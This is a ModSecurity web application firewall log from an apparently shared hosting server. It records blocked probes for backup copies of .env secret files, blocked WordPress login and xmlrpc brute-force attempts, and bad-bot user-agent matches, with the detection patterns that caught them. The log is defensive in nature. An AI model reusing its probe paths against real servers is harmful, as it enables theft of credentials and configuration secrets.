[Tue May 26 18:53:32.963191 2026] [security2:error] [pid 1036960:tid 1037202] [client 142.248.80.45:10922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahWe1IGNKXNii6nttH9acwAAAPU"]
[Tue May 26 18:53:32.963680 2026] [security2:error] [pid 1036960:tid 1037132] [client 142.248.80.45:10778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahWe1IGNKXNii6nttH9adAAAAK8"]
[Tue May 26 18:53:32.963892 2026] [security2:error] [pid 1036960:tid 1037130] [client 142.248.80.45:10970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahWe1IGNKXNii6nttH9aawAAAK0"]
[Tue May 26 18:53:32.965454 2026] [security2:error] [pid 1036960:tid 1037211] [client 142.248.80.45:10886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahWe1IGNKXNii6nttH9adwAAAP4"]
[Tue May 26 18:53:32.965566 2026] [security2:error] [pid 1036960:tid 1037168] [client 142.248.80.45:10846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahWe1IGNKXNii6nttH9aeQAAANM"]
[Tue May 26 18:53:32.967719 2026] [security2:error] [pid 1036960:tid 1037158] [client 142.248.80.45:10794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahWe1IGNKXNii6nttH9afQAAAMk"]
[Tue May 26 18:53:32.968018 2026] [security2:error] [pid 1036960:tid 1037137] [client 142.248.80.45:10868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahWe1IGNKXNii6nttH9afAAAALQ"]
[Tue May 26 18:53:32.968126 2026] [security2:error] [pid 1036960:tid 1037100] [client 142.248.80.45:10812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahWe1IGNKXNii6nttH9aeAAAAI8"]
[Tue May 26 18:53:32.968489 2026] [security2:error] [pid 1036960:tid 1037133] [client 142.248.80.45:10842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahWe1IGNKXNii6nttH9aewAAALA"]
[Tue May 26 18:53:32.968808 2026] [security2:error] [pid 1036960:tid 1037196] [client 142.248.80.45:10866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahWe1IGNKXNii6nttH9afgAAAO8"]
[Tue May 26 18:53:32.968921 2026] [security2:error] [pid 1036960:tid 1037123] [client 142.248.80.45:10862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahWe1IGNKXNii6nttH9aegAAAKY"]
[Tue May 26 18:53:32.970466 2026] [security2:error] [pid 1036960:tid 1037121] [client 142.248.80.45:10898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahWe1IGNKXNii6nttH9agQAAAKQ"]
[Tue May 26 18:53:33.873242 2026] [security2:error] [pid 1036960:tid 1037090] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe1YGNKXNii6nttH9ajQAAAIU"]
[Tue May 26 18:53:34.697519 2026] [security2:error] [pid 1036960:tid 1037211] [client 107.170.66.128:64158] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWe1oGNKXNii6nttH9asAAAAP4"]
[Tue May 26 18:53:34.750981 2026] [security2:error] [pid 1036960:tid 1037023] [remote 92.222.104.210:42904] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahWe1oGNKXNii6nttH9atAAA9T4"]
[Tue May 26 18:53:34.751175 2026] [security2:error] [pid 1036960:tid 1037202] [client 92.222.104.210:42904] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahWe1oGNKXNii6nttH9atAAA9T4"]
[Tue May 26 18:53:35.149333 2026] [security2:error] [pid 1036960:tid 1037109] [client 114.119.137.122:41753] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acacia.org.in"] [uri "/acacia-aims.htm"] [unique_id "ahWe14GNKXNii6nttH9awAAAAJg"], referer: https://www.acacia.org.in/
[Tue May 26 18:53:35.167573 2026] [security2:error] [pid 1036960:tid 1037162] [client 141.164.86.40:18011] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWe1oGNKXNii6nttH9aqQAAAM0"], referer: https://anujtradingco.com
[Tue May 26 18:53:36.197269 2026] [security2:error] [pid 1036960:tid 1037034] [remote 142.44.233.6:52668] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.aastha-enterprises.com"] [uri "/"] [unique_id "ahWe2IGNKXNii6nttH9a4wAAu0k"]
[Tue May 26 18:53:36.197471 2026] [security2:error] [pid 1036960:tid 1037144] [client 142.44.233.6:52668] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.aastha-enterprises.com"] [uri "/"] [unique_id "ahWe2IGNKXNii6nttH9a4wAAu0k"]
[Tue May 26 18:53:36.321756 2026] [security2:error] [pid 1036960:tid 1037210] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe14GNKXNii6nttH9a3AAAAP0"]
[Tue May 26 18:53:37.765835 2026] [security2:error] [pid 1036960:tid 1037029] [remote 195.33.205.242:50168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.205.33.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe2YGNKXNii6nttH9bFAAA3UQ"]
[Tue May 26 18:53:38.361707 2026] [security2:error] [pid 1036960:tid 1037161] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe2YGNKXNii6nttH9bJAAAAMw"]
[Tue May 26 18:53:38.465084 2026] [security2:error] [pid 1036960:tid 1037031] [remote 213.171.208.232:33016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe2oGNKXNii6nttH9bLgABAEY"]
[Tue May 26 18:53:39.921199 2026] [security2:error] [pid 1036960:tid 1037051] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe24GNKXNii6nttH9bXAAArVo"]
[Tue May 26 18:53:39.921366 2026] [security2:error] [pid 1036960:tid 1037130] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe24GNKXNii6nttH9bXAAArVo"]
[Tue May 26 18:53:39.974679 2026] [security2:error] [pid 1036960:tid 1037044] [remote 213.171.208.232:33016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe24GNKXNii6nttH9bWwAAh1M"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:53:40.200735 2026] [security2:error] [pid 1036960:tid 1037204] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe24GNKXNii6nttH9bVwAAAPc"]
[Tue May 26 18:53:43.039940 2026] [security2:error] [pid 1036960:tid 1037142] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe3oGNKXNii6nttH9bqAAAALk"]
[Tue May 26 18:53:44.877704 2026] [security2:error] [pid 1036960:tid 1037205] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe4IGNKXNii6nttH9b3AAAAPg"]
[Tue May 26 18:53:45.603841 2026] [security2:error] [pid 1036960:tid 1037063] [remote 54.36.102.244:46030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe4YGNKXNii6nttH9b-QAA1mY"]
[Tue May 26 18:53:46.729918 2026] [security2:error] [pid 1036960:tid 1036969] [remote 54.36.102.244:46030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe4oGNKXNii6nttH9cGAAAnQg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:53:47.581276 2026] [security2:error] [pid 1036960:tid 1037170] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe44GNKXNii6nttH9cLAAAANU"]
[Tue May 26 18:53:48.686334 2026] [security2:error] [pid 1036960:tid 1036976] [remote 107.161.176.210:57772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.176.161.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWe5IGNKXNii6nttH9cTQAAmg8"]
[Tue May 26 18:53:49.679573 2026] [security2:error] [pid 1036960:tid 1036968] [remote 103.11.102.106:55088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWe5YGNKXNii6nttH9cZwAAugc"]
[Tue May 26 18:53:49.874095 2026] [security2:error] [pid 1036960:tid 1037199] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe5YGNKXNii6nttH9cYQAAAPI"]
[Tue May 26 18:53:50.669937 2026] [security2:error] [pid 1036960:tid 1037086] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe5oGNKXNii6nttH9cjQAA930"]
[Tue May 26 18:53:50.670159 2026] [security2:error] [pid 1036960:tid 1037204] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe5oGNKXNii6nttH9cjQAA930"]
[Tue May 26 18:53:50.773431 2026] [security2:error] [pid 1036960:tid 1037122] [client 14.178.63.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe5oGNKXNii6nttH9cggAAAKU"]
[Tue May 26 18:53:51.862397 2026] [security2:error] [pid 1036960:tid 1036985] [remote 206.189.187.127:33436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe54GNKXNii6nttH9cpgAAjxg"]
[Tue May 26 18:53:52.129073 2026] [security2:error] [pid 1036960:tid 1037124] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe54GNKXNii6nttH9cqgAAAKc"]
[Tue May 26 18:53:52.351335 2026] [security2:error] [pid 1036960:tid 1036987] [remote 107.161.176.210:57772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.176.161.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWe6IGNKXNii6nttH9cwAAAzxo"], referer: https://friendsalongtheway.net/wp-login.php
[Tue May 26 18:53:52.437615 2026] [security2:error] [pid 1036960:tid 1036990] [remote 103.50.205.131:47006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe6IGNKXNii6nttH9cvwAA1x0"]
[Tue May 26 18:53:53.859025 2026] [security2:error] [pid 1036960:tid 1037197] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe6YGNKXNii6nttH9c5wAAAPA"]
[Tue May 26 18:53:54.993219 2026] [security2:error] [pid 1036960:tid 1037184] [client 158.173.241.17:45105] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWe6oGNKXNii6nttH9dQAAAAOM"], referer: http://deeigo.com/
[Tue May 26 18:53:55.284007 2026] [security2:error] [pid 1036960:tid 1037040] [remote 195.250.23.247:58594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe64GNKXNii6nttH9dQgAAnk8"]
[Tue May 26 18:53:56.006264 2026] [security2:error] [pid 1036960:tid 1037117] [client 66.249.64.172:53852] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWe6oGNKXNii6nttH9dPAAAAKA"], referer: http://doyecpa.com/prizes/268104864
[Tue May 26 18:53:56.909139 2026] [security2:error] [pid 1036960:tid 1037147] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe7IGNKXNii6nttH9dbQAAAL4"]
[Tue May 26 18:53:59.055130 2026] [security2:error] [pid 1036960:tid 1037182] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe7oGNKXNii6nttH9dsgAAAOE"]
[Tue May 26 18:54:00.796399 2026] [security2:error] [pid 1036960:tid 1037129] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe8IGNKXNii6nttH9d-gAAAKw"]
[Tue May 26 18:54:01.322243 2026] [security2:error] [pid 1036960:tid 1036995] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe8YGNKXNii6nttH9eJgAAxSI"]
[Tue May 26 18:54:01.323218 2026] [security2:error] [pid 1036960:tid 1037154] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe8YGNKXNii6nttH9eJgAAxSI"]
[Tue May 26 18:54:01.705644 2026] [security2:error] [pid 1036960:tid 1037166] [client 35.175.92.196:46846] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWe8YGNKXNii6nttH9eUgAAANE"]
[Tue May 26 18:54:01.915101 2026] [security2:error] [pid 1036960:tid 1037136] [client 35.175.92.196:50706] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWe8YGNKXNii6nttH9eYAAAALM"]
[Tue May 26 18:54:02.186465 2026] [security2:error] [pid 1036960:tid 1037213] [client 35.175.92.196:50720] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWe8oGNKXNii6nttH9ebAAAAQA"]
[Tue May 26 18:54:02.355592 2026] [security2:error] [pid 1036960:tid 1037205] [client 51.68.236.72:32927] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWe8oGNKXNii6nttH9eeQAAAPg"]
[Tue May 26 18:54:02.355752 2026] [security2:error] [pid 1036960:tid 1037205] [client 51.68.236.72:32927] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWe8oGNKXNii6nttH9eeQAAAPg"]
[Tue May 26 18:54:03.703245 2026] [security2:error] [pid 1036960:tid 1037205] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe84GNKXNii6nttH9enAAAAPg"]
